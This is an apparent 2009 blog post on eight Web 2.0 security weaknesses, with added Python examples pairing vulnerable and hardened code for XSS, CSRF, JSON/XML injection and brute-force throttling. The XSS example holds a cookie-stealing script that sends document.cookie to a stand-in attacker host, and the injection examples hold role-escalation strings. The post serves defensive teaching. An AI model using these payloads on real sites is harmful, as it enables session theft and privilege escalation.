Friday, November 6, 2009

Web 2.0 drawbacks

According to the Secure Enterprise 2.0 Forum, the following are the main security weaknesses of Web 2.0 applications:
1) Information Leakage
Web 2.0 combined with our "work-from-anywhere" lifestyle has begun to blur the lines between work and private life. Because of this psychological shift, people may inadvertently share information their employer would have considered sensitive. Even if individuals aren't sharing the equivalent of trade secrets, the accumulation of the small "non-sensitive" items they share can allow a business's competitors to gain intelligence about what's going on and being worked on at that company.

2) Phishing
Phishing is by no means a risk unique to Web 2.0, but the multitude of dissimilar client interfaces in use makes it harder for users to tell a genuine site from a fake one, which makes phishing attacks more effective.

3) Cross Site Scripting (XSS)
In a stored cross site scripting (XSS) vulnerability, malicious input sent by an attacker is saved by the system and later displayed to other users without being encoded for the page. Systems that accept formatted user content, such as HTML, are especially susceptible; blogs, social networks and wikis are all at risk. An example from last year was the Yahoo HotJobs XSS exploit, in which attackers used injected JavaScript to steal victims' session cookies. In that year and earlier ones, XSS worms were also behind attacks on Orkut, MySpace and others.
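
To make the stored XSS mechanism concrete, here is an added Python example (not code from this page or from any of the sites named above) that renders stored comments into a page the vulnerable way and the hardened way. The comment store, the template and the attacker.example host are constructed for illustration; the cookie-stealing payload is the classic pattern, not the actual HotJobs exploit.

```python
import html
import re

# Constructed comment store. The second entry is the classic cookie-stealing payload pattern;
# attacker.example is a made-up host.
STORED_COMMENTS = [
    "Great post, thanks!",
    '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
    'Nice "quotes" & <b>bold</b>',
]

TEMPLATE = '<div class="comment">{body}</div>'   # HTML text context


def render_unsafe(comment: str) -> str:
    """Vulnerable: stored user content is dropped into the page verbatim."""
    return TEMPLATE.format(body=comment)


def render_safe(comment: str) -> str:
    """Hardened: entity-encode the untrusted content for the HTML text context it lands in."""
    return TEMPLATE.format(body=html.escape(comment, quote=True))


def render_page(render, comments) -> str:
    return "\n".join(render(c) for c in comments)


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def executes_script(page_html: str) -> bool:
    """Crude stand-in for the browser: is there a live <script> element in the markup?"""
    return _SCRIPT_TAG.search(page_html) is not None


if __name__ == "__main__":
    for name, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        page = render_page(render, STORED_COMMENTS)
        print(f"[{name}] script would run: {executes_script(page)}\n{page}\n")
```

Two caveats: html.escape is only correct for HTML text and quoted attribute values, so content landing inside a script block, a URL or an event handler needs the encoding for that context; and marking the session cookie HttpOnly keeps this particular payload from reading document.cookie, but it does not remove the XSS itself.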

4) Cross Site Request Forgery (CSRF)
In a CSRF attack the victim visits an innocent-looking web site that contains code which makes the victim's browser send requests to a different site, where the browser's cookies authenticate them. Because of their heavy use of AJAX, Web 2.0 applications are potentially more exposed to this attack. In legacy applications most user-initiated requests produced a visible effect on screen, which made a forged request easier to notice; Web 2.0 systems fire requests in the background with no visual feedback, so the attack is less apparent. A recent example was a vulnerability in Twitter through which site owners could obtain the Twitter profiles of their visitors.

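
As an added example, not taken from the page: a Python sketch of the server side of the CSRF described above. The session object, the request dictionaries and the app.example and evil.example origins are constructed; the protected handler requires a per-session token that only pages on the application's own origin can read, and rejects requests whose Origin header names another site.

```python
import hmac
import secrets

SITE_ORIGIN = "https://app.example"   # assumed origin of the Web 2.0 application


class Session:
    """Server-side session, bound to a cookie the browser attaches to every request, forged or not."""

    def __init__(self, user: dict):
        self.user = user
        self.csrf_token = secrets.token_urlsafe(32)


def render_form(session: Session) -> str:
    """The genuine page embeds the session token (a hidden field here; a request header for AJAX)."""
    return f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'


def change_email_vulnerable(session: Session, request: dict) -> int:
    """Vulnerable: trusts the cookie-bound session alone, so a cross-site request goes through."""
    session.user["email"] = request["form"]["email"]
    return 200


def change_email_protected(session: Session, request: dict) -> int:
    """Hardened: reject a foreign Origin, then require the token only same-origin pages can read."""
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403
    token = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return 403
    session.user["email"] = request["form"]["email"]
    return 200


def legit_request(session: Session) -> dict:
    """Constructed: a POST from the application's own form, carrying the embedded token."""
    return {"headers": {"Origin": SITE_ORIGIN},
            "form": {"email": "alice@app.example", "csrf_token": session.csrf_token}}


def forged_request() -> dict:
    """Constructed: what a page on evil.example can make the victim's browser send. The session
    cookie rides along automatically, but the attacker cannot read the token off app.example."""
    return {"headers": {"Origin": "https://evil.example"},
            "form": {"email": "attacker@evil.example"}}


def run(handler) -> tuple:
    """Replay the forged request against a fresh logged-in session; return (status, resulting email)."""
    session = Session({"name": "alice", "email": "alice@app.example"})
    status = handler(session, forged_request())
    return status, session.user["email"]


if __name__ == "__main__":
    print("vulnerable:", run(change_email_vulnerable))
    print("protected: ", run(change_email_protected))
```

The token is the primary control; the Origin check is defence in depth, since the header can be absent and is not sent by every client. For AJAX calls the same token travels in a request header rather than a form field, and the comparison uses hmac.compare_digest so that a guessing attacker learns nothing from response timing.
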
5) Insufficient Authentication Controls
In many Web 2.0 applications, control over content is placed in the hands of many users rather than a small number of authorized personnel. That raises the chance that a less-experienced user makes a change which harms the whole system. The same design also helps attackers, who now have a larger pool of "administrative" accounts to target, and whose passwords are often easily cracked when proper controls are missing. Such systems may also lack brute-force protection, permit clear-text passwords, or be tied into a single-sign-on environment, so that one compromised password opens several systems at once.

6) Injection Flaws
Web 2.0 technologies tend to be exposed to newer kinds of injection attacks, including XML injection, XPath injection, JavaScript injection and JSON injection, simply because Web 2.0 applications use and rely on those formats; with increased use comes increased risk. In addition, because Web 2.0 applications run much of their logic on the client, they often perform input validation in client-side code, which an attacker controls and can bypass. Validation must therefore be repeated on the server.

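
An added Python example (not the page's own code) showing two of the injection classes named above, JSON and XML, in a profile-creation handler that builds the document by string formatting beside one that uses a serializer, together with the client-side username check that an attacker simply skips. The payloads, the profile format and the username rule are constructed.

```python
import json
import re
import xml.etree.ElementTree as ET

# Constructed attacker inputs: each closes the intended field and smuggles a privileged one.
JSON_PAYLOAD = 'alice", "role": "admin'
XML_PAYLOAD = "alice</name><role>admin</role><name>x"

# The check the page's JavaScript performs; an attacker simply does not run it.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def client_side_check(username: str) -> bool:
    return USERNAME_RE.fullmatch(username) is not None


def profile_json_unsafe(username: str) -> str:
    """Vulnerable: JSON assembled by string formatting; quotes in the input restructure the document."""
    return '{"role": "user", "name": "%s"}' % username


def profile_json_safe(username: str) -> str:
    """Hardened: the serializer quotes and escapes, so the input stays one string value."""
    return json.dumps({"role": "user", "name": username})


def profile_xml_unsafe(username: str) -> str:
    """Vulnerable: XML assembled by string formatting; angle brackets in the input add elements."""
    return "<user><role>user</role><name>%s</name></user>" % username


def profile_xml_safe(username: str) -> str:
    """Hardened: build the tree with the XML library, which escapes text content."""
    root = ET.Element("user")
    ET.SubElement(root, "role").text = "user"
    ET.SubElement(root, "name").text = username
    return ET.tostring(root, encoding="unicode")


def json_role(doc: str) -> str:
    """What a consumer reads back. Python keeps the last duplicate key; other parsers may differ."""
    return json.loads(doc)["role"]


def json_name(doc: str) -> str:
    return json.loads(doc)["name"]


def xml_roles(doc: str) -> list:
    return [e.text for e in ET.fromstring(doc).findall("role")]


def create_profile(username: str, serializer, server_validates: bool) -> str:
    """Server handler. Only a server-side re-check stops input that skipped the client check."""
    if server_validates and not client_side_check(username):
        raise ValueError("invalid username")
    return serializer(username)


if __name__ == "__main__":
    print(json_role(create_profile(JSON_PAYLOAD, profile_json_unsafe, server_validates=False)))  # admin
    print(json_role(create_profile(JSON_PAYLOAD, profile_json_safe, server_validates=False)))    # user
    print(xml_roles(create_profile(XML_PAYLOAD, profile_xml_unsafe, server_validates=False)))    # ['user', 'admin']
    print(xml_roles(create_profile(XML_PAYLOAD, profile_xml_safe, server_validates=False)))      # ['user']
```

The duplicate-key behaviour is worth noting: the injected JSON is still syntactically valid, and which "role" wins depends on the consuming parser, so the fix is never to build the document by concatenation in the first place. The same reasoning applies to XPath: bind user input as a variable or whitelist it, rather than splicing it into the query string.
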
7) Information Integrity
Data integrity is one of the key elements of data security. A compromise can destroy integrity, but so can unintentional misinformation. A well-known public example is a mistaken edit on Wikipedia that is then accepted as fact by many of the site's visitors. In a business environment, opening systems to many users allows a malicious or mistaken user to post and publish inaccurate information that undermines the integrity of the data.

8) Insufficient Anti-automation
The programmatic interfaces of Web 2.0 applications make it easier for attackers to automate their attacks. Besides brute-force and CSRF attacks, examples include the automated retrieval of large amounts of information and the automated opening of accounts. Anti-automation mechanisms such as CAPTCHAs and rate limiting can help slow down or thwart these attacks.
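
The brute-force and anti-automation controls called for under Insufficient Authentication Controls and Insufficient Anti-automation are illustrated by this added Python example (not from the page): a login throttle that counts recent failures per account, demands a CAPTCHA after a few, and refuses attempts for a window after many, in front of a credential store that keeps salted PBKDF2 hashes rather than clear-text passwords. The thresholds, the account and the attempt sequences are constructed, and the captcha_solved flag stands in for whatever CAPTCHA service the site would use.

```python
import hashlib
import hmac
import os
from collections import defaultdict, deque

# Assumed policy values; tune to the application.
WINDOW_SECONDS = 300   # failures older than this no longer count
CAPTCHA_AFTER = 3      # failures in the window before a CAPTCHA is demanded
LOCK_AFTER = 10        # failures in the window before attempts are refused outright
PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted, slow hash; a leaked store cannot be read back as clear-text passwords."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


# Constructed account store: one user, stored as (salt, PBKDF2 hash), no clear-text password.
_SALT = os.urandom(16)
ACCOUNTS = {"alice": (_SALT, hash_password("correct horse", _SALT))}
# Dummy record so unknown usernames cost the same time as known ones (no enumeration by timing).
_DUMMY = (os.urandom(16), hash_password("", os.urandom(16)))


class LoginThrottle:
    """Per-account failure counter that escalates: plain denial, then CAPTCHA, then lockout."""

    def __init__(self):
        self.failures = defaultdict(deque)   # username -> timestamps of recent failures

    def _recent_failures(self, username: str, now: float) -> int:
        q = self.failures[username]
        while q and now - q[0] > WINDOW_SECONDS:
            q.popleft()
        return len(q)

    def attempt(self, username: str, password: str, now: float, captcha_solved: bool = False) -> str:
        n = self._recent_failures(username, now)
        if n >= LOCK_AFTER:
            return "locked"                   # a solved CAPTCHA does not help past this point
        if n >= CAPTCHA_AFTER and not captcha_solved:
            return "captcha_required"         # not counted as a failure: the password was not checked
        salt, stored = ACCOUNTS.get(username, _DUMMY)
        ok = hmac.compare_digest(hash_password(password, salt), stored) and username in ACCOUNTS
        if ok:
            self.failures[username].clear()
            return "ok"
        self.failures[username].append(now)
        return "denied"


def simulate(attempts) -> list:
    """Run a constructed sequence of (time, username, password, captcha_solved) through one throttle."""
    throttle = LoginThrottle()
    return [throttle.attempt(u, p, t, c) for (t, u, p, c) in attempts]


# Constructed scenarios.
GUESSING = [(t, "alice", f"guess{t}", False) for t in range(5)]          # a password-guessing bot
LEGIT = [(5, "alice", "correct horse", False), (6, "alice", "correct horse", True)]
CAPTCHA_SOLVING_BOT = [(t, "alice", "guess", True) for t in range(11)] + [(400, "alice", "guess", True)]

if __name__ == "__main__":
    print(simulate(GUESSING + LEGIT))
    print(simulate(CAPTCHA_SOLVING_BOT))
```

Counting failures per account (and in practice also per source address) means a bot that outsources CAPTCHA solving still hits the lock, while the real user pays only one CAPTCHA once the bot has tripped the threshold. Account-creation endpoints get the same treatment keyed on source address, since there is no account to count against yet.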
